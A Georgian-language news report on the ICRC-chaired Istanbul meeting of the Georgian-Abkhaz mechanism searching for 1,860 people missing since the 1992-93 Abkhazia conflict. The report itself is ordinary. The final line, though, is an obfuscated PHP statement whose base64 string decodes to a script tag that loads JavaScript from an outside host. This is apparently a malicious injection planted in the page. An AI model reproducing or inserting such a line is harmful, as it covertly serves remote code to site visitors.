celsiusi
ავერსი საქკაბელი

 29 მაისს, სტამბოლში, ქართველი და აფხაზი მონაწილეებისაგან შემდგარი საკოორდინაციო მექანიზმის მე-16 შეხვედრა გაიმართა.

წითელი ჯვრის ინფორმაციით, შეხვედრის მიზანია 1992-93 წლების აფხაზეთის შეიარაღებულ კონფლიქტთან დაკავშირებით და მის შემდგომ პერიოდში უგზო-უკვლოდ დაკარგული 1860 პირის მოძიება.

შეხვედრას, როგორც ნეიტრალური შუამავალი, წითელი ჯვრის საერთაშორისო კომიტეტი (ICRC) თავმჯდომარეობდა.

მონაწილეებმა განიხილეს 2023 წლის დეკემბერში გამართული საკოორდინაციო მექანიზმის ბოლო შეხვედრის შემდგომ განხორციელებული საქმიანობა. დისკუსიისას ხაზგასმით აღინიშნა დამატებითი ინფორმაციის მოძიების საჭიროება სავარაუდო სამარხების შესახებ და ამოცნობის პროცესთან დაკავშირებული გამოწვევები ადამიანების გაუჩინარებიდან 30 წლის შემდეგ.

„მას შემდეგ, რაც საკოორდინაციო მექანიზმი შეიქმნა, 526 ადამიანის ნეშტი იქნა მოძიებული და ექსჰუმირებული. აქედან, 285 ამოცნობილია და გადაეცა ოჯახებს ღირსეულად დასაკრძალად, - აღნიშნა კავკასიაში ICRC-ის დესპანმა უგზო-უკვლოდ დაკარგული პირების საკითხებში, ანიეს ქოთუმ, რომელიც შეხვედრის თავმჯდომარე იყო.

„თუმცა, 1860 ადამიანი კვლავ უგზო-უკვლოდაა დაკარგული. მონაწილეთა შორის არსებული დიალოგი, რომელიც საკოორდინაციო მექანიზმის ჰუმანიტარულ პრინციპებს ეფუძნება, კრიტიკულად მნიშვნელოვანია შემდგომი პროგრესისათვის და უგზო-უკვლოდ დაკარგული ადამიანების ოჯახებისთვის პასუხის გასაცემად”, - აღნიშნა ანიეს ქოთუმ.

„საერთაშორისო ჰუმანიტარული სამართლის თანახმად, უგზო-უკვლოდ დაკარგული ადამიანების ოჯახებს აქვთ უფლება იცოდნენ, რა ბედი ეწიათ მათ ახლობლებს. 1992-93 წლების აფხაზეთის შეიარაღებულ კონფლიქტთან დაკავშირებით და მის შემდგომ პერიოდში უგზო-უკვლოდ დაკარგული პირების მოძიების საკითხებზე მომუშავე საკოორდინაციო მექანიზმი 2010 წელს შეიქმნა ICRC-ის ეგიდით.

ICRC, როგორც ნეიტრალური ჰუმანიტარული ორგანიზაცია, მხარს უჭერს მექანიზმს, მათ შორის, ცოდნისა და გამოცდილების გაზიარების კუთხით“, - ნათქვამია გავრცელებულ ინფორმაციაში.

131
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");